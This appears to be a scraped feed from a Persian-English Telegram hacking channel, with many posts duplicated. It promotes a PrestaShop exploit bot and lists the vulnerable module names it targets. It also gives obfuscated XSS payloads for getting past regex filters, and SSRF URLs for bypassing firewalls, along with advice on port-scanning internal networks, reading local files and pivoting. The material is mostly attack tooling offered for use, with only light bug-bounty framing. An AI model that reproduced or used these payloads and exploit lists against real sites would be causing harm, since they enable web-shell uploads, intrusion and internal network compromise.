- {
The world beyond zero and one
}👍1
Priv8 Bot
Download
List Exploits:
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/imexemi
Best Prestabot Exploit 2022 With Bypass Shell ( Cleaner From All Logger & Virus + Open Source Script )
Download
List Exploits:
blocktestimonial
columnadverts
soopamobile
soopabanners
vtermslideshow
simpleslideshow
productpageadverts
homepageadvertise
homepageadvertise2
jro_homepageadvertise
attributewizardpro
oneattributewizardpro
attributewizardproold
attributewizardpro
advancedslider
cartabandonmentpro
cartabandonmentproold
videostab
wg24themeadministration
fieldvmegamenu
wdoptionpanel
pk flexmenu
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/imexemi
آقا یه بات طراحی کردیم میاد فایلای هاستتونو حالا هرجایی ران باشه، مدیریت میکنه
آپشنهای بیشتر در اولین فرصت اضافه میشه
GITHUB
#Script #Bot
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
آپشنهای بیشتر در اولین فرصت اضافه میشه
GITHUB
#Script #Bot
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
👍3😁1
Scripts Shop
GITHUB
Frontend > UiKit
Backend > Php
#web #shop
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
GITHUB
Frontend > UiKit
Backend > Php
#web #shop
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
👍2
-$ rmdir 2024/
-$ mkdir 2025/
-$ mkdir 2025/
❤🔥17🆒2
WebSockets.pdf
230.3 KB
مقاله کامل درباره وبسوکت
منبع: پورتسوییگر
زبان: فارسی
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
T.me/imexemi
👍2
Xss Payload for bypass the regex filter with Obfuscate the alert value :
پیلود XSS برای دور زدن Regex Filter با Obfuscate کردن مقدار Alert:
#bugbountyTips #xss
〰️〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
پیلود XSS برای دور زدن Regex Filter با Obfuscate کردن مقدار Alert:
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
#bugbountyTips #xss
〰️〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍2
SSRF Payloads To Bypass Firewall
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
http://127.127.127.127
http://127.0.0.0
http://127.1
http://0
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
http://127.1.1.1:80\@127.2.2.2:80/
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0
2) Bypass using rare address:
http://127.1
http://0
3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/
5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3
How I hacked 100 hackers!
!رایتاپ چگونه 100 هکر را هک کردم
🔗link :
#Hack #writeUp #medium
#هک #رایتاپ
➖➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
!رایتاپ چگونه 100 هکر را هک کردم
🔗link :
https://medium.com/@corneacristian/how-i-hacked-100-hackers-5c3c313e8a1a
#Hack #writeUp #medium
#هک #رایتاپ
➖➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
👍1
👍1